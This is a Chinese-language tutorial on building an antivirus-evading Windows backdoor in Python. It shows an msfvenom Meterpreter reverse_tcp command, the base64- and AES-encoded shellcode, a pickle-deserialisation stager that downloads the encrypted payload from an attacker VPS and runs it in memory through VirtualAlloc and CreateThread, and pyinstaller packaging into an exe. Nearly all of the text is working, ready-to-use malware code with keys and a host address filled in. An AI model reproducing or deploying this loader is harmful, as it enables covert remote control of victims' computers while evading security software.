0x01 制作免杀

这里使用msf生成一个shellcode，因为需要使用python去做免杀。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=12345 -f py > shellcode.py

然后把shellcode进行一次base64编码，首先打开python3，然后把shellcode放在python里面合并

然后复制引号里面的内容进行base64编码

XHhmY0hceDgzXHhlNFx4ZjBceGU4XHhjY1x4MDBceDAwXHgwMEFRQVBSSDFceGQyZUhceDhiUmBRSFx4OGJSXHgxOFZIXHg4YlIgSFx4OGJyUE0xXHhjOUhceDBmXHhiN0pKSDFceGMwXHhhYzxhfFx4MDIsIEFceGMxXHhjOVxyQVx4MDFceGMxXHhlMlx4ZWRSSFx4OGJSIFx4OGJCPEFRSFx4MDFceGQwZlx4ODF4XHgxOFx4MGJceDAyXHgwZlx4ODVyXHgwMFx4MDBceDAwXHg4Ylx4ODBceDg4XHgwMFx4MDBceDAwSFx4ODVceGMwdGdIXHgwMVx4ZDBceDhiSFx4MThQRFx4OGJAIElceDAxXHhkMFx4ZTNWTTFceGM5SFx4ZmZceGM5QVx4OGI0XHg4OEhceDAxXHhkNkgxXHhjMFx4YWNBXHhjMVx4YzlcckFceDAxXHhjMThceGUwdVx4ZjFMXHgwM0wkXHgwOEU5XHhkMXVceGQ4WERceDhiQCRJXHgwMVx4ZDBmQVx4OGJceDBjSERceDhiQFx4MWNJXHgwMVx4ZDBBXHg4Ylx4MDRceDg4SFx4MDFceGQwQVhBWF5ZWkFYQVlBWkhceDgzXHhlYyBBUlx4ZmZceGUwWEFZWkhceDhiXHgxMlx4ZTlLXHhmZlx4ZmZceGZmXUlceGJld3MyXzMyXHgwMFx4MDBBVklceDg5XHhlNkhceDgxXHhlY1x4YTBceDAxXHgwMFx4MDBJXHg4OVx4ZTVJXHhiY1x4MDJceDAwMDl4XHgxOVx4OWRceDgzQVRJXHg4OVx4ZTRMXHg4OVx4ZjFBXHhiYUx3Jlx4MDdceGZmXHhkNUxceDg5XHhlYWhceDAxXHgwMVx4MDBceDAwWUFceGJhKVx4ODBrXHgwMFx4ZmZceGQ1alxuQV5QUE0xXHhjOU0xXHhjMEhceGZmXHhjMEhceDg5XHhjMkhceGZmXHhjMEhceDg5XHhjMUFceGJhXHhlYVx4MGZceGRmXHhlMFx4ZmZceGQ1SFx4ODlceGM3alx4MTBBWExceDg5XHhlMkhceDg5XHhmOUFceGJhXHg5OVx4YTV0YVx4ZmZceGQ1XHg4NVx4YzB0XG5JXHhmZlx4Y2V1XHhlNVx4ZThceDkzXHgwMFx4MDBceDAwSFx4ODNceGVjXHgxMEhceDg5XHhlMk0xXHhjOWpceDA0QVhIXHg4OVx4ZjlBXHhiYVx4MDJceGQ5XHhjOF9ceGZmXHhkNVx4ODNceGY4XHgwMH5VSFx4ODNceGM0IF5ceDg5XHhmNmpAQVloXHgwMFx4MTBceDAwXHgwMEFYSFx4ODlceGYySDFceGM5QVx4YmFYXHhhNFNceGU1XHhmZlx4ZDVIXHg4OVx4YzNJXHg4OVx4YzdNMVx4YzlJXHg4OVx4ZjBIXHg4OVx4ZGFIXHg4OVx4ZjlBXHhiYVx4MDJceGQ5XHhjOF9ceGZmXHhkNVx4ODNceGY4XHgwMH0oWEFXWWhceDAwQFx4MDBceDAwQVhqXHgwMFpBXHhiYVx4MGIvXHgwZjBceGZmXHhkNVdZQVx4YmF1bk1hXHhmZlx4ZDVJXHhmZlx4Y2VceGU5PFx4ZmZceGZmXHhmZkhceDAxXHhjM0gpXHhjNkhceDg1XHhmNnVceGI0QVx4ZmZceGU3WGpceDAwWUlceGM3XHhjMlx4ZjBceGI1XHhhMlZceGZmXHhkNQ==

将编码后的结果放入test.py主方法里面的encrypy加密函数参数里面，然后运行，会生成aes的值。

from Crypto.Cipher import AES
from binascii import a2b_hex, b2a_hex
import random
import base64
# crypto这个模块的安装比较特殊，可能会有点小坑，安装时需要注意。
# crypto，pycrypto，pycryptodome的功能是一样的。crypto与pycrypto已经没有维护了，后面可以使用pycryptodome。
# pip3 install pycryptodome 即可.


def random_num():       # 随机生成16位密钥
    lists = []
    for i in range(65, 123):
        if i in (91, 92, 93, 94, 95, 96):
            continue
        lists.append(chr(i))    # 将ascii转换为对应字符串.
    random.shuffle(lists)   # 打乱列表中的数据.
    return ''.join(lists)


def add_to_16(text):       # 要加密的明文填充空格到16的倍数位
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('' * add)
    return text.encode('utf-8')


def encrypt(text, keys, ivs):    # AES加密 CBC模式
    # key = random_num()[:16].encode('utf-8')
    # iv = bytes(random_num()[16:32].encode('utf-8'))
    # c = AES.MODE_CBC
    text = add_to_16(text)
    cipher = AES.new(keys, AES.MODE_CBC, ivs)
    cipher_text = cipher.encrypt(text)
    return b2a_hex(cipher_text)


def decrypt(text, keys, ivs):
    cryptos = AES.new(keys, AES.MODE_CBC, ivs)
    result = cryptos.decrypt(a2b_hex(text))
    return result


if __name__ == "__main__":
    key = random_num()[:16].encode('utf-8')
    iv = random_num()[16:32].encode('utf-8')
    print('key值:', key.decode('utf-8'), '偏移量:', iv.decode('utf-8'))
    get_encry = encrypt('XHhmY0hceDgzXHhlNFx4ZjBceGU4XHhjY1x4MDBceDAwXHgwMEFRQVBSSDFceGQyZUhceDhiUmBRSFx4OGJSXHgxOFZIXHg4YlIgSFx4OGJyUE0xXHhjOUhceDBmXHhiN0pKSDFceGMwXHhhYzxhfFx4MDIsIEFceGMxXHhjOVxyQVx4MDFceGMxXHhlMlx4ZWRSSFx4OGJSIFx4OGJCPEFRSFx4MDFceGQwZlx4ODF4XHgxOFx4MGJceDAyXHgwZlx4ODVyXHgwMFx4MDBceDAwXHg4Ylx4ODBceDg4XHgwMFx4MDBceDAwSFx4ODVceGMwdGdIXHgwMVx4ZDBceDhiSFx4MThQRFx4OGJAIElceDAxXHhkMFx4ZTNWTTFceGM5SFx4ZmZceGM5QVx4OGI0XHg4OEhceDAxXHhkNkgxXHhjMFx4YWNBXHhjMVx4YzlcckFceDAxXHhjMThceGUwdVx4ZjFMXHgwM0wkXHgwOEU5XHhkMXVceGQ4WERceDhiQCRJXHgwMVx4ZDBmQVx4OGJceDBjSERceDhiQFx4MWNJXHgwMVx4ZDBBXHg4Ylx4MDRceDg4SFx4MDFceGQwQVhBWF5ZWkFYQVlBWkhceDgzXHhlYyBBUlx4ZmZceGUwWEFZWkhceDhiXHgxMlx4ZTlLXHhmZlx4ZmZceGZmXUlceGJld3MyXzMyXHgwMFx4MDBBVklceDg5XHhlNkhceDgxXHhlY1x4YTBceDAxXHgwMFx4MDBJXHg4OVx4ZTVJXHhiY1x4MDJceDAwMDl4XHgxOVx4OWRceDgzQVRJXHg4OVx4ZTRMXHg4OVx4ZjFBXHhiYUx3Jlx4MDdceGZmXHhkNUxceDg5XHhlYWhceDAxXHgwMVx4MDBceDAwWUFceGJhKVx4ODBrXHgwMFx4ZmZceGQ1alxuQV5QUE0xXHhjOU0xXHhjMEhceGZmXHhjMEhceDg5XHhjMkhceGZmXHhjMEhceDg5XHhjMUFceGJhXHhlYVx4MGZceGRmXHhlMFx4ZmZceGQ1SFx4ODlceGM3alx4MTBBWExceDg5XHhlMkhceDg5XHhmOUFceGJhXHg5OVx4YTV0YVx4ZmZceGQ1XHg4NVx4YzB0XG5JXHhmZlx4Y2V1XHhlNVx4ZThceDkzXHgwMFx4MDBceDAwSFx4ODNceGVjXHgxMEhceDg5XHhlMk0xXHhjOWpceDA0QVhIXHg4OVx4ZjlBXHhiYVx4MDJceGQ5XHhjOF9ceGZmXHhkNVx4ODNceGY4XHgwMH5VSFx4ODNceGM0IF5ceDg5XHhmNmpAQVloXHgwMFx4MTBceDAwXHgwMEFYSFx4ODlceGYySDFceGM5QVx4YmFYXHhhNFNceGU1XHhmZlx4ZDVIXHg4OVx4YzNJXHg4OVx4YzdNMVx4YzlJXHg4OVx4ZjBIXHg4OVx4ZGFIXHg4OVx4ZjlBXHhiYVx4MDJceGQ5XHhjOF9ceGZmXHhkNVx4ODNceGY4XHgwMH0oWEFXWWhceDAwQFx4MDBceDAwQVhqXHgwMFpBXHhiYVx4MGIvXHgwZjBceGZmXHhkNVdZQVx4YmF1bk1hXHhmZlx4ZDVJXHhmZlx4Y2VceGU5PFx4ZmZceGZmXHhmZkhceDAxXHhjM0gpXHhjNkhceDg1XHhmNnVceGI0QVx4ZmZceGU3WGpceDAwWUlceGM3XHhjMlx4ZjBceGI1XHhhMlZceGZmXHhkNQ==', key, iv)
    print('加密后的结果：', get_encry.decode('utf-8'))
    a = decrypt(get_encry, key, iv).decode('utf-8')
    print(base64.b64decode(a))

在vps上，把生成的1.txt目录下开http服务，让他能访问1.txt

python3 -m http.server 8000

把加密后的结果放到vps上的1.txt里面。然后key值和偏移量写到test2.py里面的第20行,在第47行修改vps地址

import pickle, base64
seria = """
import base64, requests, ctypes, codecs
from Crypto.Cipher import AES


def decrypt(text, keys, ivs):
    cryptos = AES.new(keys, AES.MODE_CBC, ivs)
    result = cryptos.decrypt(bytes.fromhex(text))
    return result


def base64de(text):
    text = base64.b64decode(text)
    return text


def req(url):
    response = requests.get(url).text
    base64_data = decrypt(response, b'FXcwoyNIJYVMCrET', b'QVFZxhMdoBcbALTm')
    return base64_data


def excuetion(text):
    code = bytearray(text)
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(code)).from_buffer(code)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(code))
    )
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_uint64(ptr),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))


if __name__ == "__main__":
    data = req("http://x.x.x.x:8000/1.txt")
    source_data = base64de(data)
    source_data = codecs.escape_decode(source_data)[0]
    print('base64', source_data)
    excuetion(source_data)
"""


class serialize(object):
    def __reduce__(self):
        return exec, (seria,)


ser = pickle.dumps(serialize())
bs_ser = base64.b64encode(ser)
print(bs_ser)

然后将结果替换exp.py里面的变量值。

import pickle, base64, requests, ctypes, codecs
from binascii import a2b_hex, b2a_hex
from Crypto.Cipher import AES
bs_ser = b'gASV0AUAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFixBQAACmltcG9ydCBiYXNlNjQsIHJlcXVlc3RzLCBjdHlwZXMsIGNvZGVjcwpmcm9tIENyeXB0by5DaXBoZXIgaW1wb3J0IEFFUwoKCmRlZiBkZWNyeXB0KHRleHQsIGtleXMsIGl2cyk6CiAgICBjcnlwdG9zID0gQUVTLm5ldyhrZXlzLCBBRVMuTU9ERV9DQkMsIGl2cykKICAgIHJlc3VsdCA9IGNyeXB0b3MuZGVjcnlwdChieXRlcy5mcm9taGV4KHRleHQpKQogICAgcmV0dXJuIHJlc3VsdAoKCmRlZiBiYXNlNjRkZSh0ZXh0KToKICAgIHRleHQgPSBiYXNlNjQuYjY0ZGVjb2RlKHRleHQpCiAgICByZXR1cm4gdGV4dAoKCmRlZiByZXEodXJsKToKICAgIHJlc3BvbnNlID0gcmVxdWVzdHMuZ2V0KHVybCkudGV4dAogICAgYmFzZTY0X2RhdGEgPSBkZWNyeXB0KHJlc3BvbnNlLCBiJ0ZYY3dveU5JSllWTUNyRVQnLCBiJ1FWRlp4aE1kb0JjYkFMVG0nKQogICAgcmV0dXJuIGJhc2U2NF9kYXRhCgoKZGVmIGV4Y3VldGlvbih0ZXh0KToKICAgIGNvZGUgPSBieXRlYXJyYXkodGV4dCkKICAgIGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKICAgIHB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfaW50KDB4NDApKQogICAgYnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oY29kZSkpLmZyb21fYnVmZmVyKGNvZGUpCiAgICBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoCiAgICAgICAgY3R5cGVzLmNfdWludDY0KHB0ciksCiAgICAgICAgYnVmLAogICAgICAgIGN0eXBlcy5jX2ludChsZW4oY29kZSkpCiAgICApCiAgICBoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgICAgICBjdHlwZXMuY19pbnQoMCksCiAgICAgICAgY3R5cGVzLmNfaW50KDApLAogICAgICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwKICAgICAgICBjdHlwZXMuY19pbnQoMCksCiAgICAgICAgY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKQogICAgKQogICAgY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQoKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBkYXRhID0gcmVxKCJodHRwOi8vMTIwLjI1LjE1Ny4xMzE6ODAwMC8xLnR4dCIpCiAgICBzb3VyY2VfZGF0YSA9IGJhc2U2NGRlKGRhdGEpCiAgICBzb3VyY2VfZGF0YSA9IGNvZGVjcy5lc2NhcGVfZGVjb2RlKHNvdXJjZV9kYXRhKVswXQogICAgcHJpbnQoJ2Jhc2U2NCcsIHNvdXJjZV9kYXRhKQogICAgZXhjdWV0aW9uKHNvdXJjZV9kYXRhKQqUhZRSlC4='
bs_unser = base64.b64decode(bs_ser)
print(bs_unser)
pickle.loads(bs_unser)

然后打包ex.py成exe

pyinstaller -F ex.py

0x02 病毒查杀

0x03 模拟点击ex.exe上线

0x04 总结

加密过程是先base64编码，然后aes_cbc加密，将解密、加载shellcode的源代码进行序列化，base64编码。密钥和偏移量都是随机的。

上线流程就是运行exe会先解马base64然后反序列化，再去访问vps的txt文件进行解密，然后加载shellcode。